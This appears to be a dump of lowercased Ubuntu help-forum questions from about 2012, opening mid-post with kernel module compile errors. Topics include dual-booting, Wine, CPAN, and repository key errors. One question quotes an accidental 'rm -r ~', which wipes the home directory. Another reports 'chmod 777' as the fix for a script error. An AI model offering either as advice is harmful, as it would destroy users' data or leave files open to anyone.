/lib/modules/3.2.0-25-generic/build/include/linux/list.h:280:7 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:281:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:283:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:284:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_splice’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:296:33 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_splice_tail’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:308:27 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_splice_init’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:322:33 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘list_splice_tail_init’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:339:27 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘init_hlist_node’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:572:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:573:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_unhashed’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:578:11 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_empty’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:583:11 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘__hlist_del’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:588:29 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:589:31 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:592:7 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_del’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:598:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:599:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_add_head’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:612:30 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:613:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:615:8 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:615:20 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:616:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:617:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:617:15 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_add_before’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:624:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:624:17 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:625:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:626:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:626:18 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:627:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_add_after’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:633:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:633:16 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:634:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:635:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:635:18 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:637:9 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:638:7 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:638:29 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_add_fake’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:644:3 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:644:15 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h : in function ‘hlist_move_list’ : /lib/modules/3.2.0-25-generic/build/include/linux/list.h:654:5 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:654:18 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:655:9 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:656:6 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:656:27 : error : dereferencing pointer to incomplete type /lib/modules/3.2.0-25-generic/build/include/linux/list.h:657:5 : error : dereferencing pointer to incomplete type in file included from /lib/modules/3.2.0-25-generic/build/include/linux/module.h:12:0 , from hello-1.c:7 : /lib/modules/3.2.0-25-generic/build/include/linux/cache.h : at top level : /lib/modules/3.2.0-25-generic/build/include/linux/cache.h:5:23 : fatal error : asm/cache.h : no such file or directory compilation terminated . make : *** [ hello-1.o ] error 1 i got this error after compiling an helloworld program my program is # define module # define linux # define _kernel_ # include < linux/module.h > # include < linux/kernel.h > int init_module ( void ) { printk ( `` < 1 > hello world 1.\n '' ) ; return 0 ; } void cleanup_module ( void ) { printk ( kern_alert `` goodbye world 1.\n '' ) ; } module_license ( `` gpl '' ) ; my make file is : target : = hello-1 warn : = -w -wall -wstrict-prototypes -wmissing-prototypes include : = -isystem /lib/modules/`uname -r`/build/include cflags : = -o2 -dmodule -d_kernel_ $ { warn } $ { include } cc : = gcc-4.6 $ { target } .o : $ { target } .c .phony : clean clean : rm -rf $ { target } .o iam usin kernel 3.2.0.25 as novice i ca n't able to figure out where the problem is i searched every thing i can to know about this error but i cant understand & i get irrelevant docs anybody help me please
157423	will wubi work on a truecrypt full disk encryption windows partition ?	i have a windows machine using truecrypt 7.1a fde . i would like to use wubi to install ubuntu within windows . will doing this cause any issues with my system booting up ? from what i understand wubi does not modify any bootloaders . all it does is modify some boot settings within windows . so in theory the truecrypt custom bootloader will remain the same , and after i get through the truecrypt prompt , have the option of windows or ubuntu right ?
157429	x11 remote desktop with ubuntu 12.04	when i was running debian , i was able to start a remote session over x11 by just typing gnome-session however , with ubuntu 12.04 , this only seems to result in my desktop and background being forwarded over x11 -- the top bar ( where the clock is ) and dock are both missing . i tried starting all of unity by executing unity , but that just resulted in a segfault . how can i start a unity 2d session over x11 ? edit : i prefer x11 as i need to tunnel the connection over 2 other servers . i would need to do a good amount of port forwarding within ssh to get any other connections back . of course , if someone has any other suggestions , i 'm willing to listen .
157430	i want to remove ubuntu and reinstall windows xp from cd	ubuntu is working on the pc but i want to sell the pc with original windows xp professional edition . i can not boot the cd . rebooting and selecting `` start from cd '' always starts the installed ubuntu . i wish to format the hard disk and do a clean windows xp installation to sell it . how can i do this ?
157435	how to upgrade wine from 1.2 to 1.5 in maverick 10.10	i am using maverick meerkat ( 10.10 ) . it has wine 1.2 . i followed the instructions at winhq for updating wine . in synaptic package manager , the highest version i get now for upgrading is 1.3 , not 1.5 . how can i get upgrade to wine 1.5 ? i do not want to upgrade the ubuntu version . it seems that some of the supporting libraries such as lib6 are old . i would like to know how i can update them so as to make wine 1.5 available . update : after adding the ppa , i was able to get wine 1.4 , even though synaptic software manager listed it as 1.3 . the reason i wanted the latest wine was to install the encyclopedia britannica dvd . i got it installed in windows and started using the installation folder from wine . prior to that , i had to run windows flash installer in wine . so , this problem is already solved .
157436	does anyone know how to connect to a terminal services gateway using a rdp v6 compatible client in ubuntu 12.04 ?	right now the only reason i have windows installed ( on it 's own drive ) is that i need to connect to my computer at work and it 's behind a ts gateway . does anyone know of a rdp v6 compatible client for ubuntu that can be configured for such a task ?
157437	video 's wo n't go into full screen	whenever i try to play a video in full screen , it does nothing . i press the button , it flashes as if the video disappears , and then returns to how it was before . i have successfully gotten into full screen , but i do have to click the button a thousand times until it takes effect . and there is no surefire way that it will go into full screen , no matter how many times i click the button , it 's generally random . i have tried this on multiple sites , and it is all the same . however , i have yet to try it on a video that is not on the internet . this is a new installation of ubuntu , i have installed it before , several times , and never had a problem until the newest installation . i remember , whenever i used to go into full screen video , there being some sort of program running that had no relation to anything else . perhaps you could go into a full screen video and tell me what is running so i can install whatever i 'm missing .
157440	monit - issue to run program that displays image	i 'm working on a windows 7 machine , having a vm for ubuntu ( image disk : 12.04-desktop-i386.iso ) . on the vm i installed monit 5.3.2 , and configured some processes and applications . so i created a script to run my application . this application should display some content on the screen ( im basically displaying two images , using feh ) . the thing is : if i call my script through the command line , it runs ok , and display the images . but if i run through monit , it seems to be running ok , but it does n't display the images.in the case i try to debug it ( remote debug ) , then i can see the images . so i was supposing this could be some kind of configuration , but did n't find out what ( even using the option -i wou'ld n't work ) . i '' m showing below more details : -piece of script on monit -- -- check program runmediahandler with path `` /usr/bin/runmediahandler.sh '' if status == 1 then alert -runmediahandler.sh -- -- # ! /bin/bash java -jar /home/thais/desktop/mediahandler_rc2.jar summarizing : 1.what works : if i run java directly : java -jar /home/thais/desktop/mediahandler_rc2.jar if i run the script directly : runmediahandler.sh if i remote debug putting a breakpoint where the image should be displayed 2.what does not work : putting that piece of information on monit to `` check program '' , writen above ( even if calling monit -i start runmediahandler ) i 'm strongly believing it 's related to some background issue , otherwise , why it would display the picture using remote debug ? thank you in advance , thaă­s
157441	why is the tooltip hiding dash search on 12.04 ?	can i disable the tooltip shown at the side of the launcher icon when hovered by the mouse . these are nice , but i want to disable them , because when i press `` dash home '' button on the launcher , then want to write something on the dash , i ca n't see the letters because of the tooltip . how can i disable the unity tooltip from hiding search string in dash ? i am using ubuntu 12.04 . i have given a screenshot of the launcher . my problem is basically with this update 1 i have given advice to follow this answer in chat discussion , but nothing has changed . update 2 as an answer suggests , i updated unity to the latest version . it is now unity 5.12.0. as the below output indicates $ unity -- version unity 5.12.0
157450	why does my ubuntu one upload rate vary so much over a cellular connection ?	my `` problem '' is that ubuntu one upload rate goes from 30 kbps to 15 , then to 8 and 4 kbps , then again goes to 30 , 15 , 8 , 4 kbps ... what 's wrong ? i 'm using ubuntu 12.04 lts amd64 , connected to the internet through an android wi-fi hotspot . sorry for my bad english . thanks .
157452	ca n't update google chrome	i updated google chrome from the software updates in ubuntu 12.04 , but it did n't actually update . the `` about google chrome `` is still showing the previous release .
157455	how to change the default permissions of files created by transmission-daemon ?	i have a machine running ubuntu 12.04 server with transmission-daemon running to handle bitorrents . everything works fine except the transmission-daemon creates files as the user/group , debian-transmission , and with 744 file permissions . i would like to be able to delete and move these file from a samba share . i considered changing the primary group of the user debian-transmission , but i was worried that might mess up access to other files . i thought it would be better to change the default permission of new files created by debian-transmission to 774 , and add myself to the group debian-transmission . i know that this can be done with a umask , but my understanding is that this would be set in the .profile file and since debian-transmission has no home folder i wa n't sure if that file existed for the user . so how to i accomplish this ? suggestions or alternate solutions are welcome . thanks in advance .
157460	is it possible to install gui in ubuntu server 10.10 ?	i tried this : apt-get install ubuntu-desktop but i got this error : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/gnome-icon-theme/gnome-icon-theme_2.31.0-0ubuntu1_all.deb connection failed then i tried to install gnome-icon-theme by myself , but i ca n't find 10.10 's gnome-icon-theme in http : //pkgs.org/download/gnome-icon-theme . : - (
157469	how do i uninstall the system monitor program ?	it looks like the gnome system monitor programme itself consumes high varying cpu when launched from the system monitor active process list .
157470	error when installing cpan modules	i have install latest version of cpan v1.9800 in my ubuntu 10.04 . when i try to install any cpan module using perl -mcpan -e shell ; install gd : :graph , it 's showing below issue . i ca n't find out problem . **root @ karthik # perl -mcpan -e shell** ***terminal does not support addhistory . cpan shell -- cpan exploration and modules installation ( v1.9800 ) enter 'h ' for help . cpan [ 1 ] > install gd : :graph cpan : storable loaded ok ( v2.20 ) reading '/root/.cpan/sources/authors/01mailrc.txt.gz' cpan : compress : :zlib loaded ok ( v2.02 ) ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .done reading '/root/.cpan/sources/modules/02packages.details.txt.gz' database was generated on fri , 29 jun 2012 06:14:35 gmt cpan : http : :date loaded ok ( v5.831 ) ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .done reading '/root/.cpan/sources/modules/03modlist.data.gz' catching error : `` 'glob ' trapped by operation mask at ( eval 28 ) line 1.\cj at /usr/share/perl/5.10/cpan/index.pm line 524\cj\cicpan : :index : :rd_modlist ( 'cpan : :index ' , '/root/.cpan/sources/modules/03modlist.data.gz ' ) called at /usr/share/perl/5.10/cpan/index.pm line 85\cj\cicpan : :index : :reload ( 'cpan : :index ' ) called at /usr/share/perl/5.10/cpan.pm line 976\cj\cicpan : :exists ( 'cpan=hash ( 0x93dd658 ) ' , 'cpan : :module ' , 'gd : :graph ' ) called at /usr/share/perl/5.10/cpan/shell.pm line 1256\cj\cicpan : :shell : :expandany ( 'cpan : :shell ' , 'gd : :graph ' ) called at /usr/share/perl/5.10/cpan/shell.pm line 1681\cj\cicpan : :shell : :rematein ( 'cpan : :shell ' , 'install ' , 'gd : :graph ' ) called at /usr/share/perl/5.10/cpan/shell.pm line 1977\cj\cicpan : :shell : :__anon__ ( 'cpan : :shell ' , 'gd : :graph ' ) called at /usr/share/perl/5.10/cpan.pm line 376\cj\cieval { ... } called at /usr/share/perl/5.10/cpan.pm line 373\cj\cicpan : :shell ( ) called at -e line 1\cj '' at /usr/share/perl/5.10/cpan.pm line 392 cpan : :shell ( ) called at -e line 1 reading '/root/.cpan/sources/authors/01mailrc.txt.gz' ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .done reading '/root/.cpan/sources/modules/02packages.details.txt.gz' database was generated on fri , 29 jun 2012 06:14:35 gmt ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .done reading '/root/.cpan/sources/modules/03modlist.data.gz' terminal does not support gethistory . lockfile removed . 'glob ' trapped by operation mask at ( eval 30 ) line 1. at /usr/share/perl/5.10/cpan/index.pm line 524 cpan : :index : :rd_modlist ( 'cpan : :index ' , '/root/.cpan/sources/modules/03modlist.data.gz ' ) called at /usr/share/perl/5.10/cpan/index.pm line 85 cpan : :index : :reload ( 'cpan : :index ' ) called at /usr/share/perl/5.10/cpan.pm line 693 cpan : :all_objects ( 'cpan=hash ( 0x93dd658 ) ' , 'cpan : :distribution ' ) called at /usr/share/perl/5.10/cpan/shell.pm line 1044 cpan : :shell : :failed ( 'cpan : :shell ' , 1 , 1 ) called at /usr/share/perl/5.10/cpan.pm line 414 eval { ... } called at /usr/share/perl/5.10/cpan.pm line 414 cpan : :shell ( ) called at -e line 1***
157472	how to replicate 2 ubuntu server ?	i want to replicate 2 ubuntu server . so if i change settings on one server it will replicate to other . the server will be running zpanel ( mysql , bind , apache , postfix , etc ) .. updated the server 2 is exact the same copy of server 1 . basically after installing & updating server 1 i have made clone of server 1 . i am using vmware workstation for testing . update if i update db or something like update in /var/www/ on 1st server it automatically update on 2nd server ... ... . what i really want is ... i have 2 servers ..that will be web hosting servers ( zpanel ) i want replication on 2 identical server if one is down 2nd one will be up as it an replica of 1st
157475	building a six-screen setup . what video cards options are there ?	i 'm building myself a nice setup with a massive amount of screen real estate . since i had/have problems with video drivers in the past . i 'm asking for advise here first . i want to connect at least six screens . like this : 6 screen setup what are the best options ? what are the pitfalls ? i preferably would not like to use closed binary blob drivers . usecase scenario : i 'm writing a piece of software that has to interact with other systems . i would like to be able to see all of those systems , my code , lots of log files and documentation without the need to swap windows/screens . to just better see what im doing .
157476	are the ubuntu iso images updated from release .ubuntu.com	just got idea from this ( may not be related though ) question however . are the iso images from the official site updated with updates in core ubuntu system , like kernel updates , desktop environment updates ( unity ) , i mean updates of base system including x-org , office suite , package manager , update manager or gnome base modules , those released in update branches like precise-updates branch . the reason i am asking this is , if i download the iso image of ubuntu 12.04 say after two or three months from release , i have to do an update of approximately 200~300 mb 's size . so why are these iso images not updated to recent updates , i am aware that all of the components are not updated at the same time , but let 's say after one month from actual release ( both lts and normal releases ) , the updated components can be added to form a updated iso in regular intervals , which provides new users to use latest versions and features with improved stability and less bandwidth consumption . i am not mentioning the idea of comparison to rolling release , or external ppa 's added updates , and neither netinstal but the iso of updated packages .this can be provided as optional download . since my question is within the boundary of official updates releases so stability could not be the reason . i guess there are custom packagers out there , but having an official option would be better . it helps in distributing newest iso os which impresses a lot new users , since it makes availability of newer features and a faster system ofcourse . another reason of asking this is here . edit : since almost all new ( desktop ) users download the default iso 's having one or few issue , which may have been corrected in following updates . but most of new laptop users i encountered gave up because of it , so should i suggest , for laptop not listed on certified h/w list , to try daily builds , if needed .
157481	starting over and new to ubuntu	we have been having repeated problems with our interent service and using windows xp & sp3 ( users and premissions ) i see no need for them . i started with computers long before windows . every since sp 3 come out in 2009 i have had nothing but problems . i have lost so many computers to virius and trojans , we just stack them up . we are with qwest/ century link which is using advertising servers which i think is causing the problem . all the computers are networked together which is not how i set them up . i beleive century link is networking them through assignment of a domain for our home . this causes all the computers to crash twice . this is getting expensive . we tried buying new harddrives but reinfect with hours of connecting to internet . i also beleive the modem , router and all computers are infected . i put combofix on this one and that is the only reason we are still online with this laptop . i am afraid to install new equipment because my partner and i are on ssdi and this cost a lot . i go to school at uop and had to run off a flash and reboot this laptop to recovery every other day or so , this pass month . new plan is : we are getting ready to install new equipment but afraid to reinfect again . need help to install new equipment . the plan is to use current internet services from qwest/ now century link . the list of new equipment in order : century link wireless modem is zyxel pk5000z with 4 direct connect ethernet ports next dell optiplex 210l ( used auction purchase ) 2 gb ram 80 g hard drive ubuntu 11.10 operating system next wireless d-link router wbr-1310 with 4 direct connect ethernet ports ok -- -- -- -- purchased dell oem disk for repair or reinstalling windows xp professional operating system ( 2 roommates as well ) all infected computers are dell desktops or laptops with xp pro also purchasing ubuntu 12.04 for 3 computers . we like the way it runs but still learning it . questions 1 ] how do we fdisk the infected computers without infecting new system . we have dos disks , but none have floppy dish drive . we do have a new floppy disk drive and usb adapter we purchased from amazon . 2 ] we are thinking avast internet security because of the boot scan . we want all software loaded before reconnecting . we can manually load our internet provider information . we purchased stopzilla $ 100 for 5 computers , but not sure that is what we need . but need how to setup ports security and services we will need . really lost at this part . so we are safe when we go back on the internet . 3 ] want to connect reloaded fdisk systems to router as public connection and no sharing . do not want to network all computers . 4 ] want parental/ ownership control from ubuntu system for internet connection ( children and friends ) . do we restrict at the modem and/ or router ? any help would be a blessing . i do not want to go alone on this anymore .
157488	i want to know what config options were used to compile apache ?	my apache server crashes due to some segmentation fault . i tried to debug it by compiling the apache from source . now the crash seems to be gone with this new apache ( i tried many times to reproduce the crash . ) i compiled the apache from source using some config options helpful for debugging . i want to know what config options were used to compile the apache if i install it from binary ? i am using ubuntu 12.04
157497	ca n't install ubuntu along windows 7	i boot from a dvd the last version of ubuntu 12.04 x64 ( because i have 8g . of ram ) , hit install ubuntu , check install along windwos 7 ( or something like this , anyway the first option ) and the button in the bottom right corner says `` restart to install '' or just restart ... i cant remember . so , i hit the button than , the screen goes black , some proceses are stopped and on the middle of the screen it writes like this `` please remove installation media and close the tray ( if any ) then press enter : `` the dvd rom opens and i remove the dvd , close the tray , pushing enter and the windows is starting , no instalation , no file copied to my pc , nothing .
157500	libvirt-php creating domain	could you tell me how to create a new domain ? from php api reference guide : http : //libvirt.org/php/api-reference.html i have seen these functions : ( i ) libvirt_image_create ( $ conn , $ name , $ size , $ format ) ( ii ) libvirt_domain_new ( $ conn , $ name , $ arch , $ memmb , $ maxmemmb , $ vcpus , $ iso_image , $ disks , $ networks , $ flags ) ( iii ) libvirt_domain_create ( $ res ) ( iv ) libvirt_domain_create_xml ( $ conn , $ xml ) the problem i am facing is that i dont know the steps to create a new domain . either i have to create a new image first using libvirt_image_create ... . or something else .
157505	i ca n't click on some things and other problems	i have some issues with my ubuntu 12.04 . when i open ubuntu software center , the program opens and than just disappears just when it is opened . my ubuntu 12.04 wo n't install any updates because of this error in the picture . worst of all : i ca n't click on anything except for programs that from ubuntu : for example i ca n't browse the internet via firefox or chromium ... i ca n't click on folders . i ca n't click on things in my thunderbird mail program . but i can click on update manager for example ... it is just clicking that does n't work , when i try 'clicking ' something with using the tab-button and enter i can click on something - in every case . but that 's just too annoying to do . oh sorry guys i had some screenshots that illustrate the problems , but i ca n't get them off the 'problem pc ubuntu 12.04 ' about which i am talking ... it 's so sad
157506	wallpapers other than default are not appearing as background after restart	i 'm using ubuntu10.4 along with windows 7 and i 'm changing wallpaper other than default but after restarting the system , screen remains completely black..
157507	opening the file browser of the remote machine via terminal and moving files around ?	i can ssh to my remote desktop machine via my laptop and launch its file browser via terminal by : nautilus but i would like to be able to drag and drop the files from remote machine to my local machine ( in this case my laptop ) . how i can do this ? thanks .
157509	will the netinstall ( minimal ) work with a usb cellular modem ?	installing ubuntu minimal is extremely easy when the system has a lan card and connected to internet via cable & router ... i recently came across a situation where i needed to install ubuntu minimal on a system which wash not having a lan card and cable internet anywhere around ... the only access to the internet was through a usb plug n play data-card modem . may anyone suggest something so that i may install ubuntu minimal using usb modem as the only source of internet , if it 's possible at all ? ? ( this relates to ubuntu 12.04 in specific )
157512	ubuntu for acer netbooks ?	i want to install ubuntu on my acer netbook . but i 've had problems with the new version . the problem is with the cpu or something like this . is there an ubuntu version for netbooks ? what can i do ? because i have tried with an usb stick , the downloaded version for windows , but it 's impossible . thank you .
157513	what has 'rm -r ~ ' done to my home directory ?	gedit creates hidden backup files ending with '~ ' . i wanted to do a recursive cleanup of my directory tree . the command rm *~ will delete all local files ending with '~' i thought rm -r *~ . would delete all files in the whole tree , but i typo-ed rm -r ~ . there was a message some directory could not be deleted and i quit the command . the question is : what have i been deleting ? i did notice that my filezilla configuration was gone . does this command delete all hidden directories from the home dir ?
157514	installing ubuntu 12.04 on macbook pro9,2	i seem to have tried all the various suggested methods for installing ubuntu on a mbp , but ca n't seem to get anything that works and was wondering if anyone has run into any new problems with the latest non-retina models ? i have a core i7 in my macbook , and model identifier is macbookpro9,2 . i have partitioned my hd using disk utility and have 700gig free space ready for the install ( i have n't removed osx lion , it is still there in a 50gig partition ) . problem : i am just getting a blank screen with a blinking cursor ( unresponsive ) in the top left whenever i boot from the disk . i left it for 20 minutes and nothing ever happened . this was without any boot manager , just holding `` c '' on startup . attempted remedies : i have downloaded the 64 ubuntu iso from their site 3 times now and burned 4 separate discs to rule out some kind of corruption or burn error . i burned one in osx lion 10.7.4 and 3 on my windows 7 pc . i tried holding `` alt '' instead and then navigating to the windows disc to boot . same thing happens , blank blinking unresponsive cursor . i also tried going to the efi disc which actually brings up a menu ( after saying `` error prefix is not set '' ) asking if i want to install ubuntu , test for errors or partition . all three options lead me to an unresponsive blank screen ( some without cursors ) . i downloaded and installed refit and if i hold `` alt '' on startup a linux penguin ( boot linux from cd ) appears in my boot options , along with the apple boot , and two others that i 'm not sure of : `` boot efi\boto\bootx64.efi from '' and `` boot legacy os from '' . the `` boot linux from cd '' just takes me to the blank blinking cursor screen ; again , i left if for 10+ minutes and nothing . i heard that the detection of the graphics card might be a problem and that i need change to nomodeset , but i have tried pressing f6 in all of the boot menus listed above and no options appear . does anyone have any other suggested routes or can you see what i might have done wrong ?
157523	why do windows files moved to ubuntu nas disappear ?	i have build a ubuntu nas to store my windows files . i can move files from windows to the shared folder in ubuntu but when logged in ubuntu , i ca n't see the windows files that i have moved over to the ubuntu folder . is there a way to see them from the ubuntu side ?
157526	3d acceleration for acer travelmate 5740z	hi i have installed ubuntu 12 and i wonder if there is 3d acceleration support for my graphic card : vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) i tested with glxgears and the result it 's as it follows : 300 frames in 5.0 seconds = 59.988 fps should n't suppose to be higher with 3d acceleration support ?
157527	following windows	i have installed whatpulse on my ubuntu 12.04 . i would like the whatpulse window ( s ) to follow me onto whatever workspace i go to ( the windows are already always on top ) . if it may help , i already have compizconfig installed and i have desktop cube set `` on '' . thanks , mjchopperboy
157529	how do i get vmware workstation 8.0.4 working on ubuntu 12.04 64 bit ?	i 've bought vmware workstation 8 just today . after the installation i launched it and the application noticed me that `` several modules must be compiled and loaded into the running kernel '' . during the process , vmware noticed me that was impossible to configure virtual network devices and at the end , was impossible to start the services . the last message said that further information could be found at this address : /tmp/vmware-root-975001794/modconfig-22789.log so , i 've pasted the content of the log message here . can you help me or , rather , you suggest to wait for future updates of ubuntu ? my desktop environment is unity .
157534	why does my live-usb fail to boot with `` syslinux ... '' ?	i having trouble getting to boot from a live usb pendrive explained in ubuntu.com website . i downloaded various iso images and only had success in booting from live a cd or dvd . i 've gotten newer hardware which it should be able to boot from usb . i set the bios option to boot from usb fdd first and i get something like in the following scene but it remains stuck in : syslinux ... peter avin . i tried booting from usb with pendrivelinux.com and unetbootin on my older machine before and i have never been able to do it successfully . in fact the only time i was able to boot a linux distro through usb was puppy linux and back then i had to do a legacy puppy linux option done to the usb stick for my older hardware to boot from the usb .
157535	how do i use an unbootable xp to remove ubuntu ?	i installed ubuntu 12.04 on a laptop from a usb stick , but the system asks me a password and i do n't know what it is . it may be old to have an ubuntu installed and errors , but i ca n't remove , because windows xp is damaged and unbootable . someone can help me ?
157537	how to disable advertisement from ubuntu software center	how can i disable the advertisements in the ubuntu software center ? thanks for your help . joe hollik
157538	how to add a daemon to a quickly project	currently i 'm developing an application with quickly which is divided in two parts : a graphical ui where the user could configure some things , and a daemon which do the most work in the background . i started with the ui , to create some windows for settings and so on . now i want to start coding the daemon , but i have no clue how to implement the daemon in my quickly project . could i simply paste the files of the daemon in project folder or is there an implementation method for adding new files to a quickly project ? or do i have to create a new project and merge them together ?
157545	bumblebee 3.0 has disabled unity desktop effects	i have an acer aspire 5750g intel core i3 intel/nvidia geforce 610m graphics teeworlds , supertux , google earth did not work until i installed bumblebee 3.0 , then all of these problems were solved with auto switch but now i have a new problem , my beautiful unity desktop effect has disappeared . i tried this wiki method but it did not work sudo rm /etc/x11/xorg.conf how can i get my unity 3d back ?
157552	spotify update error message stops updates from occurring	after todays update , i restarted my system and got this message : when i check for updates it says that there are no updates available , and that last update was 7 days ago , which is not true since i updated today . what should i do ? after running sudo apt-get update & & sudo apt-get upgrade i can see the following error : http : //paste.ubuntu.com/1065838/ fetched 173 kb in 11s ( 15.4 kb/s ) reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //repository.spotify.com stable inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 082ccedf94558f59 w : failed to fetch http : //repository.spotify.com/dists/stable/inrelease
157554	choppy , stuttery & sped-up sound after update	my audio has always worked perfectly on this hardware and 12.04 . yesterday i received an update , including a kernel update . today the sound is periodically stuffed . in youtube , mkv files via vlc and embedded audio in web pages ( memrise.com ) the sound can become stuttery , sped up or stopped mid play-back . where can i go to find if this is a known problem , or report it if it is not ? also , can i find a log that will tell me what packages were updated on my machine yesterday ?
157556	problem with 'insert_at_cursor ' attribute	i made something , so after clicking a button , some text should appear in the textview . part of my code : def on_button1_clicked ( self , builer ) : self.writetest = self.builder.get_object ( `` textview1 '' ) self.writetest.insert_at_cursor ( `` something '' ) unfortunately , when i click the button i get : attributeerror : 'textview ' object has no attribute 'insert_at_cursor' according to gtk documentation there is such attribute : http : //developer.gnome.org/gtk3/stable/gtktextview.html # gtktextview-insert-at-cursor i have the same problem with entry as well , if i change textview to entry . but if i use set_text instead of insert_at_cursor in my code , it works .
157561	multisystem script wo n't work ! `` syntax error : redirection unexpected '' worked 2 days ago ?	this is my first question . i use multisystem all of the time and have installed it on both kubuntu and ubuntu and have used it with no issues . i wiped my hard drive to try some new oss i 'm now using the exact same os ( ubuntu 12.05 ) i used to load my usb stick to begin with and now i 'm getting this ridiculous syntax error . i know the script is correct , i 'm following the exact same steps i used to get to this point and i 'm getting different results ? ! ? ! i 'm very confused by this . i have no clue how to begin addressing this issue . i get the same syntax error on kubuntu now too , which did have multisystem installed . i run `` sh install-depot-multisystem.sh '' and get `` syntax error : redirection unexpected '' , this worked literally 2 days ago . the only thing that has changed is my face has grown some more facial hair and my head hurts from bangin it against the wall over this issue . the os is exactly the same , the script is the same ; but now it wo n't install . i 'm lost and really hoping someone can help . append just to append to this a bit https : //lists.ubuntu.com/archives/ub ... er/000264.html i needed to do a chmod 777 on the script , i 'm still getting a syntax error on kubuntu ... but it did install successfully . i 'll mark this as resovled ! thanks anyway , i 'll try to spruse up on my linux skills .
